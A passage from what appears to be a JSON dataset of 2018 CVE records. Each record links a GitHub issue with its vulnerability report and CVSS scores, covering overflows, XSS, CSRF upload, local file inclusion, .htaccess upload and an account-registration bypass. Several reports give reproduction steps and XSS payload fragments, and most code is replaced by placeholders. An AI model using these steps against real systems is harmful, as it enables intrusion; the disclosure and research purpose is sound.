  89175. "description": "Heap buffer overflow in function APITAG I used gcc NUMBERTAG and APITAG ( APITAG before make ) to build libiec NUMBERTAG URLTAG . In the directory APITAG , the following specific APITAG sequence will cause heap buffer overflow in function APITAG in APITAG : CODETAG However, if the APITAG is constructed like following two way, this error will not be triggered. APITAG or CODETAG In detail, the complete version of APITAG that triggers heap buffer overflow is FILETAG . In order to verify this problem, just replace it with initial APITAG in APITAG , compile it and run it by command APITAG . This is the ASAN information: ERRORTAG",
  89176. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89177. "severity": "CRITICAL",
  89178. "baseScore": 9.8,
  89179. "impactScore": 5.9,
  89180. "exploitabilityScore": 3.9
  89181. },
  89182. {
  89183. "CVE_ID": "CVE-2018-18927",
  89184. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/22",
  89185. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/22",
  89186. "Repo_new": "sanluan/publiccms",
  89187. "Issue_Created_At": "2018-11-01T13:26:09Z",
  89188. "description": "There is a stored xss via PATHTAG in logo. Hello, my nickname is isecream, I found a stored xss in the logo. First, access the page FILETAG the logo is obtained from the database. FILETAG Then, I write the xss payload to the database via PATHTAG FILETAG you can see, the value has been changed FILETAG And then, access the last page FILETAG so, there is a stored xss in all logos",
  89189. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  89190. "severity": "MEDIUM",
  89191. "baseScore": 4.8,
  89192. "impactScore": 2.7,
  89193. "exploitabilityScore": 1.7
  89194. },
  89195. {
  89196. "CVE_ID": "CVE-2018-19135",
  89197. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/494",
  89198. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/494",
  89199. "Repo_new": "clippercms/clippercms",
  89200. "Issue_Created_At": "2018-11-10T18:21:01Z",
  89201. "description": "APITAG NUMBERTAG File Upload CSRF Vulnerability. Hi, This is regarding the APITAG NUMBERTAG File Upload CSRF Vulnerability that I already reported by sending a direct email last August NUMBERTAG regarding this issue and followed up on September NUMBERTAG and September NUMBERTAG but haven't received any reply. APITAG NUMBERTAG does not have CSRF protection on its kcfinder file upload which is being used by default. This can be used by an attacker to perform actions for an admin (or any user with file upload capability). With this vulnerability, it can automatically upload file/s _(by default it allows APITAG as file types)_. Note that web shell that can be used for remote code execution can be achieved depending on the file types being accepted. Uploaded file can be accessed publicly on the \" /assets/files \" directory (e.g. uploaded a malicious html file with filename: FILETAG file => URLTAG This can lead for the website to be host unintended file/s. Steps to reproduce: Admin (or user with file upload capability) logged in APITAG NUMBERTAG browse/open a controlled website with the poc below (e.g. by link or open APITAG below in a browser where admin/user logged in to APITAG NUMBERTAG file is uploaded and can be accessed on URLTAG (where FILETAG is the filename of the uploaded file) Proof of Concept: APITAG below will automatically upload a \" FILETAG \" file with simple XSS payload. Steps above are how to make use of the APITAG ERRORTAG Actual video demo of the APITAG NUMBERTAG file upload CSRF vulnerability being exploited: ![IMAGE ALT TEXT HERE URLTAG",
  89202. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89203. "severity": "HIGH",
  89204. "baseScore": 8.8,
  89205. "impactScore": 5.9,
  89206. "exploitabilityScore": 2.8
  89207. },
  89208. {
  89209. "CVE_ID": "CVE-2018-19139",
  89210. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/188",
  89211. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/188",
  89212. "Repo_new": "jasper-software/jasper",
  89213. "Issue_Created_At": "2018-11-09T08:25:24Z",
  89214. "description": "memory leak detected. Hello jasper team, I have identified an issue affecting jasper by using AFL fuzz. PATHTAG valgrind v tool=memcheck leak check=full jasper input APITAG output FILETAG output format bmp NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: jasper input APITAG output FILETAG output format bmp NUMBERTAG algrind options NUMBERTAG tool=memcheck NUMBERTAG leak check=full NUMBERTAG Contents of /proc/version NUMBERTAG Linux version NUMBERTAG kali1 amd NUMBERTAG EMAILTAG rg) (gcc version NUMBERTAG APITAG NUMBERTAG SMP Debian NUMBERTAG kali NUMBERTAG Arch and hwcaps: AMD NUMBERTAG APITAG amd NUMBERTAG c NUMBERTAG lzcnt rdtscp sse3 avx a NUMBERTAG bmi NUMBERTAG Page sizes: currently NUMBERTAG max supported NUMBERTAG algrind library directory: PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG f3df wanted NUMBERTAG e0f NUMBERTAG c NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG object doesn't have a dynamic symbol table NUMBERTAG Scheduler: using generic scheduler lock implementation NUMBERTAG Reading suppressions file: PATHTAG NUMBERTAG embedded gdbserver: reading from /tmp/vgdb pipe from vgdb to NUMBERTAG by root on NUMBERTAG embedded gdbserver: writing to /tmp/vgdb pipe to vgdb from NUMBERTAG by root on NUMBERTAG embedded gdbserver: shared mem /tmp/vgdb pipe shared mem vgdb NUMBERTAG by root on NUMBERTAG TO CONTROL THIS PROCESS USING vgdb (which you probably NUMBERTAG don't want to do, unless you know exactly what you're doing NUMBERTAG or are doing some strange experiment NUMBERTAG PATHTAG pid NUMBERTAG command NUMBERTAG TO DEBUG THIS PROCESS USING GDB: start GDB 
like this NUMBERTAG PATHTAG jasper NUMBERTAG and then give GDB the following command NUMBERTAG target remote | PATHTAG pid NUMBERTAG pid is optional if only one valgrind process is running NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG strlen) redirected to NUMBERTAG APITAG NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG index) redirected to NUMBERTAG b APITAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a2a NUMBERTAG wanted NUMBERTAG c7eb NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a NUMBERTAG wanted NUMBERTAG af NUMBERTAG a NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG WARNING: new redirection conflicts with existing ignoring it NUMBERTAG old NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG APITAG NUMBERTAG new NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG a NUMBERTAG strlen NUMBERTAG REDIR NUMBERTAG aab0 (ld linu NUMBERTAG so NUMBERTAG strcmp) redirected to NUMBERTAG b NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG e7d0 (ld linu NUMBERTAG so NUMBERTAG mempcpy) redirected to NUMBERTAG d1a0 (mempcpy NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bcd0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c2b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2e NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d1c0 APITAG 
redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2cff0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c NUMBERTAG b NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c1e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bdb0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d4c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c2e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c1b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d3d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2cfc0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d2d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2e NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG cff NUMBERTAG APITAG redirected to NUMBERTAG e0 (rinde NUMBERTAG REDIR NUMBERTAG cff8d0 APITAG redirected to NUMBERTAG a0 (strlen NUMBERTAG REDIR NUMBERTAG c 
NUMBERTAG c0 APITAG redirected to NUMBERTAG malloc NUMBERTAG REDIR NUMBERTAG cecc NUMBERTAG APITAG redirected to NUMBERTAG a NUMBERTAG strcpy NUMBERTAG REDIR NUMBERTAG cdb0a0 APITAG redirected to NUMBERTAG a NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG c NUMBERTAG c NUMBERTAG APITAG redirected to NUMBERTAG free NUMBERTAG REDIR NUMBERTAG cffe NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memmove NUMBERTAG REDIR NUMBERTAG cff NUMBERTAG APITAG redirected to NUMBERTAG ccd0 (strchrnul NUMBERTAG REDIR NUMBERTAG cffdf0 APITAG redirected to NUMBERTAG cde0 (mempcpy) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: ignoring unknown marker segment NUMBERTAG ff NUMBERTAG type NUMBERTAG ff NUMBERTAG UNKNOWN); len NUMBERTAG c NUMBERTAG ff ff ff ff ff ff ff NUMBERTAG ff ff ff NUMBERTAG warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes NUMBERTAG REDIR NUMBERTAG d NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memset NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGABRT NUMBERTAG at NUMBERTAG BDAF3B: raise APITAG NUMBERTAG by NUMBERTAG BDC2F0: abort APITAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG E3E0: jpc_dec_decode APITAG NUMBERTAG by NUMBERTAG E3E0: jpc_decode APITAG NUMBERTAG by NUMBERTAG AA NUMBERTAG jas_image_decode APITAG NUMBERTAG by NUMBERTAG A7E3: main APITAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG Searching for pointers to NUMBERTAG not freed blocks NUMBERTAG Checked NUMBERTAG bytes NUMBERTAG bytes in NUMBERTAG blocks are definitely lost in loss record NUMBERTAG of NUMBERTAG at NUMBERTAG BF: malloc APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG jas_malloc APITAG NUMBERTAG by NUMBERTAG F NUMBERTAG jpc_unk_getparms APITAG 
NUMBERTAG by NUMBERTAG FA9FA: jpc_getms APITAG NUMBERTAG by NUMBERTAG E1AB: jpc_dec_decode APITAG NUMBERTAG by NUMBERTAG E1AB: jpc_decode APITAG NUMBERTAG by NUMBERTAG AA NUMBERTAG jas_image_decode APITAG NUMBERTAG by NUMBERTAG A7E3: main APITAG NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Reachable blocks (those to which a pointer was found) are not shown NUMBERTAG To see them, rerun with: leak check=full show leak kinds=all NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Aborted PATHTAG jasper input APITAG output FILETAG output format bmp warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: ignoring unknown marker segment NUMBERTAG ff NUMBERTAG type NUMBERTAG ff NUMBERTAG UNKNOWN); len NUMBERTAG c NUMBERTAG ff ff ff ff ff ff ff NUMBERTAG ff ff ff NUMBERTAG warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) Aborted Attached the POC FILETAG Version jasper NUMBERTAG Found by:TAN JIE",
  89215. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89216. "severity": "MEDIUM",
  89217. "baseScore": 5.5,
  89218. "impactScore": 3.6,
  89219. "exploitabilityScore": 1.8
  89220. },
  89221. {
  89222. "CVE_ID": "CVE-2018-19246",
  89223. "Issue_Url_old": "https://github.com/Athlon1600/php-proxy-app/issues/134",
  89224. "Issue_Url_new": "https://github.com/athlon1600/php-proxy-app/issues/134",
  89225. "Repo_new": "athlon1600/php-proxy-app",
  89226. "Issue_Created_At": "2018-11-13T04:06:52Z",
  89227. "description": "PHP Proxy NUMBERTAG Local File Inclusion (LFI) Vulnerability (on default pre installed version). Brief description of this vulnerability: Downloadable pre installed version of PHP Proxy NUMBERTAG current as of this posting day) from www.php proxy.com ( FILETAG make use of a default app_key which can be used for local file inclusion attacks. This can be used to generate an encrypted string which can gain access to arbitrary local files in the server. (example: _ URLTAG Affected Version NUMBERTAG pre installed version) Reason of this vulnerability: The downloadable pre installed version of PHP Proxy NUMBERTAG current pre installed version as of this posting day) from www.php proxy.com ( FILETAG already contains the default app_key in FILETAG file which might be used by several users using the application thus is vulnerable to local file inclusion. APITAG Encrypted URL value lies on the app_key as seen on a snippet of code below. ERRORTAG Wherein the key is the encryption_key and by default, its value depends on the md5 hash of app_key and the visiting IP address. CODETAG Combining all the functions above, an encrypted URL can be generated which contains the local file inclusion vulnerability payload. Proof of Concept: Code below will output an encrypted string which can exploit the local file inclusion vulnerability. Add the encrypted string on the PHP Proxy NUMBERTAG application URL: example: _ URLTAG (replace APITAG with the generated encrypted string value) ERRORTAG Below screenshot is an example of gaining an encrypted URL string which was used to read the PATHTAG of the server. FILETAG Impact: Gain access to arbitrary local files in the server. Suggested Mitigation: There is already a FILETAG included on the downloadable pre installed version of PHP Proxy which will generate and overwrite the default app_key, however users most probably don't use it and keep on using the default app_key. Possible mitigation is to make the app_key value in the FILETAG blank and make users just make use of the FILETAG to generate and overwrite the default app_key.",
  89228. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  89229. "severity": "HIGH",
  89230. "baseScore": 7.5,
  89231. "impactScore": 3.6,
  89232. "exploitabilityScore": 3.9
  89233. },
  89234. {
  89235. "CVE_ID": "CVE-2018-19416",
  89236. "Issue_Url_old": "https://github.com/sysstat/sysstat/issues/196",
  89237. "Issue_Url_new": "https://github.com/sysstat/sysstat/issues/196",
  89238. "Repo_new": "sysstat/sysstat",
  89239. "Issue_Created_At": "2018-11-21T03:26:28Z",
  89240. "description": "bug report]: out of bound read in sadf which may lead to code execution. Information: version: APITAG related APITAG ERRORTAG Description: APITAG doesn't check the args and sadf crashes when the args is invalid. The following is my debug info ERRORTAG If we control src and n of memmove , stack overflow may happen which lead to ROP even code execution! ASAN ERRORTAG [poc here URLTAG",
  89241. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89242. "severity": "HIGH",
  89243. "baseScore": 7.8,
  89244. "impactScore": 5.9,
  89245. "exploitabilityScore": 1.8
  89246. },
  89247. {
  89248. "CVE_ID": "CVE-2018-19423",
  89249. "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1098",
  89250. "Issue_Url_new": "https://github.com/codiad/codiad/issues/1098",
  89251. "Repo_new": "codiad/codiad",
  89252. "Issue_Created_At": "2018-11-11T16:26:19Z",
  89253. "description": "APITAG Execution of upload files.. Hello, I have a question about management of uploaded file in your application. Is it intended behavior that uploaded files are executable? I checked that Codiad has not the mitigations for execution of uploaded file. Even though uploading feature needs administrator credential, execution of uploaded file is still dangerous. I think it needs to the mitigations like compressing/encoding upload file or hide the upload path.",
  89254. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  89255. "severity": "HIGH",
  89256. "baseScore": 7.2,
  89257. "impactScore": 5.9,
  89258. "exploitabilityScore": 1.2
  89259. },
  89260. {
  89261. "CVE_ID": "CVE-2018-19424",
  89262. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/495",
  89263. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/495",
  89264. "Repo_new": "clippercms/clippercms",
  89265. "Issue_Created_At": "2018-11-14T08:19:01Z",
  89266. "description": "APITAG NUMBERTAG allows to upload htaccess file in default setting.. Brief of this vulnerability APITAG allows to upload .htaccess. It is able to execute the any types of the extensions as PHP scripts. Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Affect version NUMBERTAG Reason of This Vulnerability .htaccess is allowed to upload in your default whitelist. It should be removed in default whitelist. It can change the access configuration about current directory and subdirectories. Even this file can drive to execute any extensions as PHP script. This vulnerability needs admin credentials, but it can be used to get system shell to adversary who get the admin authority using other attack( e.g. XSS ).",
  89267. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  89268. "severity": "HIGH",
  89269. "baseScore": 7.2,
  89270. "impactScore": 5.9,
  89271. "exploitabilityScore": 1.2
  89272. },
  89273. {
  89274. "CVE_ID": "CVE-2018-19654",
  89275. "Issue_Url_old": "https://github.com/Venan24/SCMS/issues/1",
  89276. "Issue_Url_new": "https://github.com/venan24/scms/issues/1",
  89277. "Repo_new": "venan24/scms",
  89278. "Issue_Created_At": "2018-11-28T07:26:36Z",
  89279. "description": "smcs NUMBERTAG arbitrarily account register . smcs NUMBERTAG arbitrarily account register via FILETAG firstly,register an account test|test FILETAG then,let's see the issue code ERRORTAG we can see the parameter was validated by the function of APITAG we can not use some special characters.but when database meets %c2,it will be identified as a invalid character and also fit the ruler of the function APITAG thus.We can register another test finally,register other account test%c NUMBERTAG FILETAG",
  89280. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  89281. "severity": "HIGH",
  89282. "baseScore": 7.5,
  89283. "impactScore": 3.6,
  89284. "exploitabilityScore": 3.9
  89285. },
  89286. {
  89287. "CVE_ID": "CVE-2018-19666",
  89288. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1585",
  89289. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1585",
  89290. "Repo_new": "ossec/ossec-hids",
  89291. "Issue_Created_At": "2018-11-28T06:22:52Z",
  89292. "description": "Windows Agent Priv Esc to nt authority\\system. There's a directory traversal issue on the local windows OSSEC agent that allows a low privilege user to become nt authority\\system if they have access to the OSSEC server. Requirements to exploit NUMBERTAG Full access to the OSSEC server NUMBERTAG Low privileged access to a windows system that has the ossec hids agent installed.",
  89293. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  89294. "severity": "HIGH",
  89295. "baseScore": 7.8,
  89296. "impactScore": 5.9,
  89297. "exploitabilityScore": 1.8
  89298. },
  89299. {
  89300. "CVE_ID": "CVE-2018-19751",
  89301. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/83",
  89302. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/83",
  89303. "Repo_new": "domainmod/domainmod",
  89304. "Issue_Created_At": "2018-11-23T10:28:40Z",
  89305. "description": "Stored XSS vulnerability in Custom SSL Fields. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps NUMBERTAG Goto vulnerable endpoint NUMBERTAG At the place of Display Name, Description, notes put xss payload \"> APITAG POC FILETAG",
  89306. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  89307. "severity": "MEDIUM",
  89308. "baseScore": 4.8,
  89309. "impactScore": 2.7,
  89310. "exploitabilityScore": 1.7
  89311. },
  89312. {
  89313. "CVE_ID": "CVE-2018-19785",
  89314. "Issue_Url_old": "https://github.com/Athlon1600/php-proxy-app/issues/140",
  89315. "Issue_Url_new": "https://github.com/athlon1600/php-proxy-app/issues/140",
  89316. "Repo_new": "athlon1600/php-proxy-app",
  89317. "Issue_Created_At": "2018-11-30T07:29:06Z",
  89318. "description": "PHP Proxy ver NUMBERTAG have Cross Site Scripting (XSS) Vulnerability. PHP Proxy before NUMBERTAG has Cross Site Scripting (XSS) via the URL field in APITAG . Ref. FILETAG FILETAG",
  89319. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89320. "severity": "MEDIUM",
  89321. "baseScore": 6.1,
  89322. "impactScore": 2.7,
  89323. "exploitabilityScore": 2.8
  89324. },
  89325. {
  89326. "CVE_ID": "CVE-2018-19837",
  89327. "Issue_Url_old": "https://github.com/sass/libsass/issues/2659",
  89328. "Issue_Url_new": "https://github.com/sass/libsass/issues/2659",
  89329. "Repo_new": "sass/libsass",
  89330. "Issue_Created_At": "2018-06-02T07:24:05Z",
  89331. "description": "APITAG stack overflow in APITAG APITAG We found with our fuzzer some stack over flow errors in APITAG APITAG APITAG when compiled with Address Sanitizer (using sassc as the driver). ERRORTAG Sample input files: FILETAG FILETAG FILETAG",
  89332. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89333. "severity": "MEDIUM",
  89334. "baseScore": 6.5,
  89335. "impactScore": 3.6,
  89336. "exploitabilityScore": 2.8
  89337. },
  89338. {
  89339. "CVE_ID": "CVE-2018-19840",
  89340. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/53",
  89341. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/53",
  89342. "Repo_new": "dbry/wavpack",
  89343. "Issue_Created_At": "2018-11-26T15:27:04Z",
  89344. "description": "Infinite loop when block_samples NUMBERTAG using wavpack. As to NUMBERTAG wavpack might trigger an infinite loop at APITAG due to mis calculation of APITAG . wavpack blocksize NUMBERTAG h $FILE o /tmp/test.wv y example input wav files: FILETAG",
  89345. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89346. "severity": "MEDIUM",
  89347. "baseScore": 5.5,
  89348. "impactScore": 3.6,
  89349. "exploitabilityScore": 1.8
  89350. },
  89351. {
  89352. "CVE_ID": "CVE-2018-19849",
  89353. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/8",
  89354. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/8",
  89355. "Repo_new": "yzmcms/yzmcms",
  89356. "Issue_Created_At": "2018-11-08T15:47:22Z",
  89357. "description": "APITAG NUMBERTAG SS bug. Hi, I would like to report Cross Site Scripting vulnerability in APITAG NUMBERTAG Description: Cross site scripting (XSS) vulnerability in search pages and you can inject arbitrary web script or HTML via the multiple parameters. In the FILETAG row NUMBERTAG No filtering of the searinfo parameter FILETAG Steps To Reproduce NUMBERTAG login to administrator panel. APITAG below URL in browser which supports flash. url: URLTAG {xsspayload}&dosubmit NUMBERTAG eg: xsspayload=\"> APITAG alert NUMBERTAG APITAG FILETAG FILETAG Fix: Filter the searinfo parameter",
  89358. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  89359. "severity": "MEDIUM",
  89360. "baseScore": 4.8,
  89361. "impactScore": 2.7,
  89362. "exploitabilityScore": 1.7
  89363. },
  89364. {
  89365. "CVE_ID": "CVE-2018-20060",
  89366. "Issue_Url_old": "https://github.com/urllib3/urllib3/issues/1316",
  89367. "Issue_Url_new": "https://github.com/urllib3/urllib3/issues/1316",
  89368. "Repo_new": "urllib3/urllib3",
  89369. "Issue_Created_At": "2018-01-17T01:02:04Z",
  89370. "description": "Auth header remains during redirects. Requests does it: URLTAG",
  89371. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89372. "severity": "CRITICAL",
  89373. "baseScore": 9.8,
  89374. "impactScore": 5.9,
  89375. "exploitabilityScore": 3.9
  89376. },
  89377. {
  89378. "CVE_ID": "CVE-2018-20195",
  89379. "Issue_Url_old": "https://github.com/knik0/faad2/issues/25",
  89380. "Issue_Url_new": "https://github.com/knik0/faad2/issues/25",
  89381. "Repo_new": "knik0/faad2",
  89382. "Issue_Created_At": "2018-12-17T06:25:35Z",
  89383. "description": "Null pointer dereference vulnerability in ic_predict APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function ic_predict .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  89384. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89385. "severity": "MEDIUM",
  89386. "baseScore": 5.5,
  89387. "impactScore": 3.6,
  89388. "exploitabilityScore": 1.8
  89389. },
  89390. {
  89391. "CVE_ID": "CVE-2018-20199",
  89392. "Issue_Url_old": "https://github.com/knik0/faad2/issues/24",
  89393. "Issue_Url_new": "https://github.com/knik0/faad2/issues/24",
  89394. "Repo_new": "knik0/faad2",
  89395. "Issue_Created_At": "2018-12-17T06:22:35Z",
  89396. "description": "Null pointer dereference vulnerability in APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function ifilter_bank.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  89397. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89398. "severity": "MEDIUM",
  89399. "baseScore": 5.5,
  89400. "impactScore": 3.6,
  89401. "exploitabilityScore": 1.8
  89402. },
  89403. {
  89404. "CVE_ID": "CVE-2018-20362",
  89405. "Issue_Url_old": "https://github.com/knik0/faad2/issues/26",
  89406. "Issue_Url_new": "https://github.com/knik0/faad2/issues/26",
  89407. "Repo_new": "knik0/faad2",
  89408. "Issue_Created_At": "2018-12-17T06:28:49Z",
  89409. "description": "Null pointer dereference vulnerability in ifilter_bank APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function ifilter_bank.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  89410. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89411. "severity": "MEDIUM",
  89412. "baseScore": 5.5,
  89413. "impactScore": 3.6,
  89414. "exploitabilityScore": 1.8
  89415. },
  89416. {
  89417. "CVE_ID": "CVE-2018-20405",
  89418. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/354",
  89419. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/354",
  89420. "Repo_new": "bigtreecms/bigtree-cms",
  89421. "Issue_Created_At": "2018-12-21T06:22:47Z",
